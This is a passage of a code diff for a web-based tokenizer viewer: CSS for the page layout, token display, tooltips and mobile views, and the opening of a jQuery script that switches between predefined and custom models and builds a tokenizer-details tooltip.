+ .header {
426
+ display: flex;
427
+ justify-content: space-between;
428
+ align-items: center;
429
+ margin-bottom: 2rem;
430
+ position: relative;
431
+ }
432
+
433
+ .title-section {
434
+ flex-grow: 1;
435
+ }
436
+
437
+ .title {
438
+ font-size: 2.5rem;
439
+ font-weight: 800;
440
+ color: var(--primary-color);
441
+ margin-bottom: 0.5rem;
442
+ }
443
+
444
+ .subtitle {
445
+ color: var(--secondary-text);
446
+ font-size: 1.1rem;
447
+ }
448
+
449
+ .model-selector {
450
+ position: relative;
451
+ min-width: 200px;
452
+ }
453
+
454
+ .model-selector-header {
455
+ display: flex;
456
+ gap: 0.5rem;
457
+ margin-bottom: 0.5rem;
458
+ }
459
+
460
+ .model-type-toggle {
461
+ display: flex;
462
+ background-color: var(--card-bg);
463
+ border-radius: 0.5rem;
464
+ padding: 0.25rem;
465
+ overflow: hidden;
466
+ }
467
+
468
+ .toggle-option {
469
+ padding: 0.5rem 0.75rem;
470
+ font-size: 0.8rem;
471
+ font-weight: 500;
472
+ cursor: pointer;
473
+ transition: var(--transition);
474
+ border-radius: 0.375rem;
475
+ color: var(--secondary-text);
476
+ }
477
+
478
+ .toggle-option.active {
479
+ background-color: var(--primary-color);
480
+ color: white;
481
+ }
482
+
483
+ select {
484
+ width: 100%;
485
+ padding: 0.75rem 1rem;
486
+ border: 2px solid var(--input-border);
487
+ border-radius: 0.5rem;
488
+ font-size: 1rem;
489
+ color: var(--text-color);
490
+ background-color: var(--input-bg);
491
+ cursor: pointer;
492
+ transition: var(--transition);
493
+ appearance: none;
494
+ background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%230f4f9b'%3E%3Cpath d='M7 10l5 5 5-5H7z'/%3E%3C/svg%3E");
495
+ background-repeat: no-repeat;
496
+ background-position: right 1rem center;
497
+ background-size: 1.5rem;
498
+ }
499
+
500
+ select:hover, .custom-model-input:hover {
501
+ border-color: var(--primary-color);
502
+ }
503
+
504
+ select:focus, .custom-model-input:focus {
505
+ outline: none;
506
+ border-color: var(--primary-color);
507
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
508
+ }
509
+
510
+ .custom-model-input {
511
+ width: 100%;
512
+ padding: 0.75rem 1rem;
513
+ border: 2px solid var(--input-border);
514
+ border-radius: 0.5rem;
515
+ font-size: 1rem;
516
+ color: var(--text-color);
517
+ background-color: var(--input-bg);
518
+ transition: var(--transition);
519
+ }
520
+
521
+ .input-section {
522
+ margin-bottom: 2rem;
523
+ }
524
+
525
+ textarea {
526
+ width: 100%;
527
+ height: 150px;
528
+ padding: 1.25rem;
529
+ border: 2px solid var(--input-border);
530
+ border-radius: 0.75rem;
531
+ resize: vertical;
532
+ font-size: 1rem;
533
+ margin-bottom: 1rem;
534
+ transition: var(--transition);
535
+ background-color: var(--input-bg);
536
+ color: var(--text-color);
537
+ }
538
+
539
+ textarea:focus {
540
+ outline: none;
541
+ border-color: var(--input-focus);
542
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
543
+ }
544
+
545
+ .button-container {
546
+ display: flex;
547
+ justify-content: center;
548
+ width: 100%;
549
+ gap: 1rem;
550
+ }
551
+
552
+ button {
553
+ padding: 0.875rem 2.5rem;
554
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
555
+ color: #fff;
556
+ border: none;
557
+ border-radius: 0.75rem;
558
+ font-size: 1.1rem;
559
+ font-weight: 600;
560
+ cursor: pointer;
561
+ transition: var(--transition);
562
+ box-shadow: 0 4px 6px -1px rgba(15, 79, 155, 0.2);
563
+ }
564
+
565
+ button:hover {
566
+ transform: translateY(-2px);
567
+ box-shadow: 0 6px 8px -1px rgba(15, 79, 155, 0.3);
568
+ }
569
+
570
+ button:active {
571
+ transform: translateY(0);
572
+ }
573
+
574
+ button:disabled {
575
+ opacity: 0.7;
576
+ cursor: not-allowed;
577
+ }
578
+
579
+ .card {
580
+ background-color: var(--card-bg);
581
+ border-radius: 1rem;
582
+ box-shadow: var(--card-shadow);
583
+ padding: 1.5rem;
584
+ margin-bottom: 2rem;
585
+ transition: var(--transition);
586
+ }
587
+
588
+ .card:hover {
589
+ transform: translateY(-2px);
590
+ box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
591
+ }
592
+
593
+ .card-title {
594
+ font-size: 1.25rem;
595
+ font-weight: 700;
596
+ color: var(--text-color);
597
+ margin-bottom: 1.25rem;
598
+ display: flex;
599
+ align-items: center;
600
+ gap: 0.5rem;
601
+ cursor: pointer;
602
+ }
603
+
604
+ .card-title::before {
605
+ content: '';
606
+ display: block;
607
+ width: 4px;
608
+ height: 1.25rem;
609
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
610
+ border-radius: 2px;
611
+ }
612
+
613
+ .token-container {
614
+ display: flex;
615
+ flex-wrap: wrap;
616
+ gap: 0.375rem;
617
+ margin-bottom: 1rem;
618
+ padding: 1rem;
619
+ background-color: #2a2a2a;
620
+ border-radius: 0.5rem;
621
+ max-height: 200px;
622
+ overflow-y: auto;
623
+ transition: max-height 0.3s ease;
624
+ }
625
+
626
+ .token-container.expanded {
627
+ max-height: none;
628
+ }
629
+
630
+ .token {
631
+ padding: 0.375rem 0.75rem;
632
+ border-radius: 0.375rem;
633
+ background-color: var(--input-bg);
634
+ font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
635
+ font-size: 0.875rem;
636
+ color: var(--text-color);
637
+ cursor: default;
638
+ transition: var(--transition);
639
+ box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05);
640
+ }
641
+
642
+ .token:hover {
643
+ transform: translateY(-1px);
644
+ box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
645
+ }
646
+
647
+ .stats-grid {
648
+ display: grid;
649
+ grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
650
+ gap: 1.5rem;
651
+ margin-bottom: 2rem;
652
+ }
653
+
654
+ .stat-card {
655
+ background-color: var(--card-bg);
656
+ padding: 1.5rem;
657
+ border-radius: 1rem;
658
+ box-shadow: var(--card-shadow);
659
+ transition: var(--transition);
660
+ }
661
+
662
+ .stat-card:hover {
663
+ transform: translateY(-2px);
664
+ box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
665
+ }
666
+
667
+ .stat-title {
668
+ color: var(--secondary-text);
669
+ font-size: 0.875rem;
670
+ font-weight: 500;
671
+ margin-bottom: 0.5rem;
672
+ text-transform: uppercase;
673
+ letter-spacing: 0.05em;
674
+ }
675
+
676
+ .stat-value {
677
+ color: var(--text-color);
678
+ font-size: 2rem;
679
+ font-weight: 700;
680
+ line-height: 1.2;
681
+ margin-bottom: 0.25rem;
682
+ }
683
+
684
+ .stat-description {
685
+ color: var(--secondary-text);
686
+ font-size: 0.875rem;
687
+ }
688
+
689
+ .expand-button {
690
+ background: none;
691
+ border: none;
692
+ color: var(--primary-color);
693
+ font-size: 0.875rem;
694
+ padding: 0.5rem;
695
+ cursor: pointer;
696
+ display: block;
697
+ margin: 0 auto;
698
+ box-shadow: none;
699
+ }
700
+
701
+ .expand-button:hover {
702
+ text-decoration: underline;
703
+ transform: none;
704
+ box-shadow: none;
705
+ }
706
+
707
+ .error-message {
708
+ color: #EF4444;
709
+ background-color: #3a1f1f;
710
+ border: 1px solid #562626;
711
+ padding: 1rem;
712
+ border-radius: 0.5rem;
713
+ margin-bottom: 1rem;
714
+ display: none;
715
+ }
716
+
717
+ .display-limit-notice {
718
+ background-color: #4b2b07;
719
+ border: 1px solid #7c4a02;
720
+ color: #FFD591;
721
+ padding: 0.75rem;
722
+ border-radius: 0.5rem;
723
+ margin-top: 1rem;
724
+ font-size: 0.875rem;
725
+ display: none;
726
+ }
727
+
728
+ /* File drop zone styles */
729
+ .file-drop-zone {
730
+ position: fixed;
731
+ top: 0;
732
+ left: 0;
733
+ width: 100%;
734
+ height: 100%;
735
+ background-color: rgba(15, 79, 155, 0.15);
736
+ z-index: 1000;
737
+ display: flex;
738
+ justify-content: center;
739
+ align-items: center;
740
+ opacity: 0;
741
+ pointer-events: none;
742
+ transition: opacity 0.3s ease;
743
+ }
744
+
745
+ .file-drop-zone.active {
746
+ opacity: 1;
747
+ pointer-events: all;
748
+ }
749
+
750
+ .drop-indicator {
751
+ background-color: var(--card-bg);
752
+ border: 2px dashed var(--primary-color);
753
+ border-radius: 1rem;
754
+ padding: 2rem;
755
+ text-align: center;
756
+ width: 60%;
757
+ max-width: 400px;
758
+ box-shadow: 0 8px 32px rgba(0, 0, 0, 0.25);
759
+ animation: pulse 2s infinite;
760
+ }
761
+
762
+ @keyframes pulse {
763
+ 0% { transform: scale(1); }
764
+ 50% { transform: scale(1.05); }
765
+ 100% { transform: scale(1); }
766
+ }
767
+
768
+ .drop-indicator p {
769
+ margin-bottom: 0.5rem;
770
+ color: var(--text-color);
771
+ font-size: 1.2rem;
772
+ }
773
+
774
+ .file-icon {
775
+ font-size: 3rem;
776
+ margin-bottom: 1rem;
777
+ color: var(--primary-color);
778
+ }
779
+
780
+ .file-upload-icon {
781
+ position: fixed;
782
+ bottom: 20px;
783
+ left: 20px;
784
+ width: 45px;
785
+ height: 45px;
786
+ background-color: var(--card-bg);
787
+ border-radius: 50%;
788
+ display: flex;
789
+ justify-content: center;
790
+ align-items: center;
791
+ cursor: pointer;
792
+ z-index: 100;
793
+ box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
794
+ transition: transform 0.2s ease, box-shadow 0.2s ease;
795
+ }
796
+
797
+ .file-upload-icon:hover {
798
+ transform: translateY(-2px);
799
+ box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
800
+ }
801
+
802
+ .file-upload-icon span {
803
+ font-size: 1.5rem;
804
+ color: var(--primary-color);
805
+ }
806
+
807
+ .file-info {
808
+ position: fixed;
809
+ bottom: 20px;
810
+ left: 75px;
811
+ background-color: var(--card-bg);
812
+ color: var(--primary-color);
813
+ font-weight: 500;
814
+ padding: 0.5rem 1rem;
815
+ border-radius: 1rem;
816
+ box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
817
+ max-width: 270px;
818
+ white-space: nowrap;
819
+ overflow: hidden;
820
+ text-overflow: ellipsis;
821
+ z-index: 100;
822
+ display: none;
823
+ }
824
+
825
+ .file-detach {
826
+ margin-left: 8px;
827
+ display: inline-block;
828
+ width: 18px;
829
+ height: 18px;
830
+ background-color: rgba(255, 255, 255, 0.1);
831
+ color: var(--text-color);
832
+ border-radius: 50%;
833
+ text-align: center;
834
+ line-height: 16px;
835
+ font-size: 12px;
836
+ cursor: pointer;
837
+ transition: all 0.2s ease;
838
+ }
839
+
840
+ .file-detach:hover {
841
+ background-color: rgba(255, 0, 0, 0.2);
842
+ color: #ff6b6b;
843
+ transform: scale(1.1);
844
+ }
845
+
846
+ .preview-notice {
847
+ background-color: #273c56;
848
+ border: 1px solid #365a82;
849
+ color: #89b4e8;
850
+ padding: 0.75rem;
851
+ border-radius: 0.5rem;
852
+ margin-top: 1rem;
853
+ font-size: 0.875rem;
854
+ display: none;
855
+ }
856
+
857
+ .custom-model-wrapper {
858
+ position: relative;
859
+ }
860
+
861
+ .model-badge {
862
+ position: absolute;
863
+ top: -10px;
864
+ right: -5px;
865
+ background: linear-gradient(135deg, #22c55e 0%, #15803d 100%);
866
+ color: white;
867
+ font-size: 0.7rem;
868
+ font-weight: 700;
869
+ padding: 0.25rem 0.5rem;
870
+ border-radius: 999px;
871
+ transform: scale(0);
872
+ transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);
873
+ box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
874
+ z-index: 10;
875
+ }
876
+
877
+ .model-badge.show {
878
+ transform: scale(1);
879
+ }
880
+
881
+ .custom-model-help {
882
+ display: inline-block;
883
+ width: 16px;
884
+ height: 16px;
885
+ line-height: 16px;
886
+ font-size: 11px;
887
+ font-weight: bold;
888
+ text-align: center;
889
+ background-color: var(--secondary-text);
890
+ color: var(--card-bg);
891
+ border-radius: 50%;
892
+ margin-left: 5px;
893
+ cursor: help;
894
+ vertical-align: middle;
895
+ }
896
+
897
+ .tooltip {
898
+ position: absolute;
899
+ top: 100%;
900
+ left: 0;
901
+ width: 280px;
902
+ background-color: #333;
903
+ color: #fff;
904
+ padding: 0.75rem;
905
+ border-radius: 0.5rem;
906
+ font-size: 0.8rem;
907
+ margin-top: 0.5rem;
908
+ z-index: 100;
909
+ box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
910
+ opacity: 0;
911
+ visibility: hidden;
912
+ transition: opacity 0.2s, visibility 0.2s;
913
+ }
914
+
915
+ .custom-model-help:hover + .tooltip {
916
+ opacity: 1;
917
+ visibility: visible;
918
+ }
919
+
920
+ /* Tokenizer info icon and tooltip styles */
921
+ .tokenizer-info-icon {
922
+ display: inline-flex;
923
+ align-items: center;
924
+ justify-content: center;
925
+ width: 24px;
926
+ height: 24px;
927
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
928
+ color: white;
929
+ border-radius: 50%;
930
+ position: absolute;
931
+ left: -32px; /* Position to the left of the selector */
932
+ top: 50%;
933
+ transform: translateY(-50%);
934
+ cursor: pointer;
935
+ font-size: 12px;
936
+ font-weight: bold;
937
+ transition: all 0.2s ease;
938
+ z-index: 10;
939
+ box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
940
+ }
941
+
942
+ .tokenizer-info-icon:hover {
943
+ transform: translateY(-50%) scale(1.1);
944
+ box-shadow: 0 3px 8px rgba(0, 0, 0, 0.3);
945
+ }
946
+
947
+ /* Watermark styles */
948
+ .watermark {
949
+ position: fixed;
950
+ bottom: 20px;
951
+ right: 20px;
952
+ color: var(--primary-color);
953
+ font-size: 1.4rem;
954
+ font-weight: 700;
955
+ opacity: 0.25; /* Semi-transparent */
956
+ z-index: 100;
957
+ transition: opacity 0.3s ease;
958
+ text-decoration: none;
959
+ pointer-events: auto; /* Ensure it remains clickable */
960
+ }
961
+
962
+ .watermark:hover {
963
+ opacity: 0.6; /* Increase opacity on hover */
964
+ }
965
+
966
+ .tokenizer-info-tooltip {
967
+ position: absolute;
968
+ top: calc(100% + 8px);
969
+ left: -30px; /* Adjust position to align with the icon */
970
+ width: 300px;
971
+ background-color: var(--card-bg);
972
+ color: var(--text-color);
973
+ border: 1px solid var(--primary-color);
974
+ border-radius: 0.75rem;
975
+ box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
976
+ padding: 1rem;
977
+ z-index: 1000; /* Increase z-index to ensure visibility */
978
+ opacity: 0;
979
+ visibility: hidden;
980
+ transition: opacity 0.3s, visibility 0.3s;
981
+ pointer-events: none; /* Initially disable pointer events */
982
+ }
983
+
984
+ .tokenizer-info-icon:not(.tooltip-disabled):hover + .tokenizer-info-tooltip {
985
+ opacity: 1;
986
+ visibility: visible;
987
+ pointer-events: auto;
988
+ }
989
+
990
+ .tokenizer-info-tooltip:hover {
991
+ opacity: 1;
992
+ visibility: visible;
993
+ pointer-events: auto;
994
+ }
995
+
996
+ .tokenizer-info-header {
997
+ font-size: 1.1rem;
998
+ font-weight: 600;
999
+ margin-bottom: 0.5rem;
1000
+ padding-bottom: 0.5rem;
1001
+ border-bottom: 1px solid rgba(255, 255, 255, 0.1);
1002
+ color: var(--primary-color);
1003
+ }
1004
+
1005
+ .tokenizer-info-grid {
1006
+ display: grid;
1007
+ grid-template-columns: repeat(2, 1fr);
1008
+ gap: 0.75rem;
1009
+ margin: 0.75rem 0;
1010
+ }
1011
+
1012
+ .tokenizer-info-item {
1013
+ display: flex;
1014
+ flex-direction: column;
1015
+ }
1016
+
1017
+ .tokenizer-info-label {
1018
+ font-size: 0.75rem;
1019
+ color: var(--secondary-text);
1020
+ margin-bottom: 0.25rem;
1021
+ }
1022
+
1023
+ .tokenizer-info-value {
1024
+ font-size: 0.95rem;
1025
+ font-weight: 500;
1026
+ }
1027
+
1028
+ .special-tokens-container {
1029
+ margin-top: 0.75rem;
1030
+ background-color: rgba(15, 79, 155, 0.1);
1031
+ border-radius: 0.5rem;
1032
+ padding: 0.5rem;
1033
+ max-height: 100px;
1034
+ overflow-y: auto;
1035
+ }
1036
+
1037
+ .special-token-item {
1038
+ display: flex;
1039
+ justify-content: space-between;
1040
+ margin-bottom: 0.25rem;
1041
+ font-size: 0.8rem;
1042
+ }
1043
+
1044
+ .token-name {
1045
+ color: var(--secondary-text);
1046
+ }
1047
+
1048
+ .token-value {
1049
+ background-color: rgba(255, 255, 255, 0.1);
1050
+ padding: 1px 4px;
1051
+ border-radius: 2px;
1052
+ font-family: monospace;
1053
+ }
1054
+
1055
+ .tokenizer-info-loading {
1056
+ display: flex;
1057
+ justify-content: center;
1058
+ align-items: center;
1059
+ height: 100px;
1060
+ }
1061
+
1062
+ .tokenizer-info-spinner {
1063
+ width: 30px;
1064
+ height: 30px;
1065
+ border: 3px solid var(--primary-color);
1066
+ border-radius: 50%;
1067
+ border-top-color: transparent;
1068
+ animation: spin 1s linear infinite;
1069
+ }
1070
+
1071
+ .tokenizer-info-error {
1072
+ color: #f87171;
1073
+ font-size: 0.9rem;
1074
+ text-align: center;
1075
+ padding: 1rem;
1076
+ }
1077
+
1078
+ /* Mobile responsiveness improvements */
1079
+ @media (max-width: 768px) {
1080
+ body {
1081
+ padding: 1rem;
1082
+ }
1083
+
1084
+ .container {
1085
+ max-width: 100%;
1086
+ }
1087
+
1088
+ .header {
1089
+ flex-direction: column;
1090
+ align-items: stretch;
1091
+ gap: 1rem;
1092
+ }
1093
+
1094
+ .title {
1095
+ font-size: 2rem;
1096
+ }
1097
+
1098
+ .subtitle {
1099
+ font-size: 1rem;
1100
+ }
1101
+
1102
+ .model-selector {
1103
+ width: 100%;
1104
+ }
1105
+
1106
+ .model-type-toggle {
1107
+ justify-content: center;
1108
+ }
1109
+
1110
+ .toggle-option {
1111
+ flex: 1;
1112
+ text-align: center;
1113
+ }
1114
+
1115
+ textarea {
1116
+ height: 120px;
1117
+ font-size: 16px; /* Prevents zoom on iOS */
1118
+ }
1119
+
1120
+ .keyboard-shortcut-hint {
1121
+ top: 5px;
1122
+ right: 5px;
1123
+ font-size: 0.7rem;
1124
+ padding: 0.2rem 0.4rem;
1125
+ }
1126
+
1127
+ .search-toggle-btn {
1128
+ width: 32px;
1129
+ height: 32px;
1130
+ min-width: 32px;
1131
+ min-height: 32px;
1132
+ }
1133
+
1134
+ .search-toggle-btn svg {
1135
+ width: 16px;
1136
+ height: 16px;
1137
+ }
1138
+
1139
+ .stats-grid {
1140
+ grid-template-columns: 1fr;
1141
+ gap: 1rem;
1142
+ }
1143
+
1144
+ .stat-card {
1145
+ padding: 1rem;
1146
+ }
1147
+
1148
+ .stat-value {
1149
+ font-size: 1.5rem;
1150
+ }
1151
+
1152
+ .token-container {
1153
+ max-height: 150px;
1154
+ font-size: 0.8rem;
1155
+ }
1156
+
1157
+ .token {
1158
+ padding: 0.25rem 0.5rem;
1159
+ font-size: 0.75rem;
1160
+ }
1161
+
1162
+ .token-search-container {
1163
+ padding: 1rem;
1164
+ }
1165
+
1166
+ .token-search-row {
1167
+ flex-direction: column;
1168
+ gap: 1rem;
1169
+ }
1170
+
1171
+ .token-search-controls {
1172
+ justify-content: space-between;
1173
+ flex-wrap: wrap;
1174
+ gap: 0.5rem;
1175
+ }
1176
+
1177
+ .token-search-btn {
1178
+ flex: 1;
1179
+ min-width: 60px;
1180
+ }
1181
+
1182
+ .token-search-count {
1183
+ order: -1;
1184
+ width: 100%;
1185
+ text-align: center;
1186
+ margin-bottom: 0.5rem;
1187
+ }
1188
+
1189
+ .token-search-input {
1190
+ font-size: 16px; /* Prevents zoom on iOS */
1191
+ }
1192
+
1193
+ .frequency-chart-container {
1194
+ margin-top: 1rem;
1195
+ padding: 0.75rem;
1196
+ }
1197
+
1198
+ .frequency-chart-title {
1199
+ flex-direction: column;
1200
+ gap: 0.75rem;
1201
+ align-items: stretch;
1202
+ text-align: center;
1203
+ }
1204
+
1205
+ .frequency-item {
1206
+ flex-direction: column;
1207
+ gap: 0.5rem;
1208
+ align-items: stretch;
1209
+ }
1210
+
1211
+ .frequency-token {
1212
+ align-self: flex-start;
1213
+ min-width: auto;
1214
+ }
1215
+
1216
+ .frequency-bar-container {
1217
+ width: 100%;
1218
+ }
1219
+
1220
+ .tokenizer-info-tooltip {
1221
+ width: 280px;
1222
+ left: -50px;
1223
+ }
1224
+
1225
+ .tokenizer-info-grid {
1226
+ grid-template-columns: 1fr;
1227
+ }
1228
+
1229
+ .file-info {
1230
+ max-width: 200px;
1231
+ font-size: 0.8rem;
1232
+ }
1233
+
1234
+ .loading-content {
1235
+ padding: 1.5rem;
1236
+ min-width: 150px;
1237
+ }
1238
+
1239
+ .loading-text {
1240
+ font-size: 1rem;
1241
+ }
1242
+
1243
+ .button-container {
1244
+ flex-direction: column;
1245
+ align-items: stretch;
1246
+ }
1247
+
1248
+ button {
1249
+ padding: 1rem 2rem;
1250
+ font-size: 1rem;
1251
+ }
1252
+ }
1253
+
1254
+ @media (max-width: 480px) {
1255
+ body {
1256
+ padding: 0.5rem;
1257
+ }
1258
+
1259
+ .title {
1260
+ font-size: 1.75rem;
1261
+ }
1262
+
1263
+ .card {
1264
+ padding: 1rem;
1265
+ }
1266
+
1267
+ .stat-card {
1268
+ padding: 0.75rem;
1269
+ }
1270
+
1271
+ .token-container {
1272
+ padding: 0.75rem;
1273
+ gap: 0.25rem;
1274
+ }
1275
+
1276
+ .token {
1277
+ padding: 0.2rem 0.4rem;
1278
+ font-size: 0.7rem;
1279
+ }
1280
+
1281
+ .tokenizer-info-tooltip {
1282
+ width: 260px;
1283
+ left: -60px;
1284
+ }
1285
+
1286
+ .frequency-chart-container {
1287
+ padding: 0.5rem;
1288
+ }
1289
+
1290
+ .frequency-item {
1291
+ padding: 0.375rem;
1292
+ }
1293
+
1294
+ .frequency-token {
1295
+ font-size: 0.7rem;
1296
+ padding: 0.2rem 0.4rem;
1297
+ }
1298
+ }
app/static/js/main.js ADDED
@@ -0,0 +1,837 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ $(document).ready(function() {
2
+ // File handling variables
3
+ let currentFile = null;
4
+ let originalTextContent = null;
5
+ let lastUploadedFileName = null;
6
+ let fileJustUploaded = false; // Flag to prevent immediate detachment
7
+ let currentModelType = window.tokenizerData?.model_type || 'predefined';
8
+ let currentTokenizerInfo = null;
9
+
10
+ // Try to parse tokenizer info if available from server
11
+ try {
12
+ currentTokenizerInfo = window.tokenizerData?.tokenizer_info || null;
13
+ if (currentTokenizerInfo) {
14
+ updateTokenizerInfoDisplay(currentTokenizerInfo, currentModelType === 'custom');
15
+ }
16
+ } catch(e) {
17
+ console.error("Error parsing tokenizer info:", e);
18
+ }
19
+
20
+ // Show error if exists
21
+ if (window.tokenizerData?.error) {
22
+ showError(window.tokenizerData.error);
23
+ }
24
+
25
+ // Setup model type based on initial state
26
+ if (currentModelType === "custom") {
27
+ $('.toggle-option').removeClass('active');
28
+ $('.custom-toggle').addClass('active');
29
+ $('#predefinedModelSelector').hide();
30
+ $('#customModelSelector').show();
31
+ }
32
+
33
+ // Show success badge if custom model loaded successfully
34
+ if (currentModelType === "custom" && !window.tokenizerData?.error) {
35
+ $('#modelSuccessBadge').addClass('show');
36
+ setTimeout(() => {
37
+ $('#modelSuccessBadge').removeClass('show');
38
+ }, 3000);
39
+ }
40
+
41
+ // Toggle between predefined and custom model inputs
42
+ $('.toggle-option').click(function() {
43
+ const modelType = $(this).data('type');
44
+ $('.toggle-option').removeClass('active');
45
+ $(this).addClass('active');
46
+ currentModelType = modelType;
47
+
48
+ if (modelType === 'predefined') {
49
+ $('#predefinedModelSelector').show();
50
+ $('#customModelSelector').hide();
51
+ $('#modelTypeInput').val('predefined');
52
+ // Set the model input value to the selected predefined model
53
+ $('#modelInput').val($('#modelSelect').val());
54
+ } else {
55
+ $('#predefinedModelSelector').hide();
56
+ $('#customModelSelector').show();
57
+ $('#modelTypeInput').val('custom');
58
+ }
59
+
60
+ // Clear tokenizer info if switching models
61
+ if (modelType === 'predefined') {
62
+ $('#tokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
63
+ fetchTokenizerInfo($('#modelSelect').val(), false);
64
+ } else {
65
+ $('#customTokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
66
+ // Only fetch if there's a custom model value
67
+ const customModel = $('#customModelInput').val();
68
+ if (customModel) {
69
+ fetchTokenizerInfo(customModel, true);
70
+ }
71
+ }
72
+ });
73
+
74
+ // Update hidden input when custom model input changes
75
+ $('#customModelInput').on('input', function() {
76
+ $('#customModelInputHidden').val($(this).val());
77
+ });
78
+
79
+ function showError(message) {
80
+ const errorDiv = $('#errorMessage');
81
+ errorDiv.text(message);
82
+ errorDiv.show();
83
+ setTimeout(() => errorDiv.fadeOut(), 5000);
84
+ }
85
+
86
+ // Function to update tokenizer info display in tooltip
87
+ function updateTokenizerInfoDisplay(info, isCustom = false) {
88
+ const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
89
+ let htmlContent = '';
90
+
91
+
92
+ if (info.error) {
93
+ $(targetSelector).html(`<div class="tokenizer-info-error">${info.error}</div>`);
94
+ return;
95
+ }
96
+
97
+ // Start building the tooltip content
98
+ htmlContent = `<div class="tokenizer-info-header">Tokenizer Details</div>
99
+ <div class="tokenizer-info-grid">`;
100
+
101
+ // Dictionary size
102
+ if (info.vocab_size) {
103
+ htmlContent += `
104
+ <div class="tokenizer-info-item">
105
+ <span class="tokenizer-info-label">Dictionary Size</span>
106
+ <span class="tokenizer-info-value">${info.vocab_size.toLocaleString()}</span>
107
+ </div>`;
108
+ }
109
+
110
+ // Tokenizer type
111
+ if (info.tokenizer_type) {
112
+ htmlContent += `
113
+ <div class="tokenizer-info-item">
114
+ <span class="tokenizer-info-label">Tokenizer Type</span>
115
+ <span class="tokenizer-info-value">${info.tokenizer_type}</span>
116
+ </div>`;
117
+ }
118
+
119
+
120
+ // Max length
121
+ if (info.model_max_length) {
122
+ htmlContent += `
123
+ <div class="tokenizer-info-item">
124
+ <span class="tokenizer-info-label">Max Length</span>
125
+ <span class="tokenizer-info-value">${info.model_max_length.toLocaleString()}</span>
126
+ </div>`;
127
+ }
128
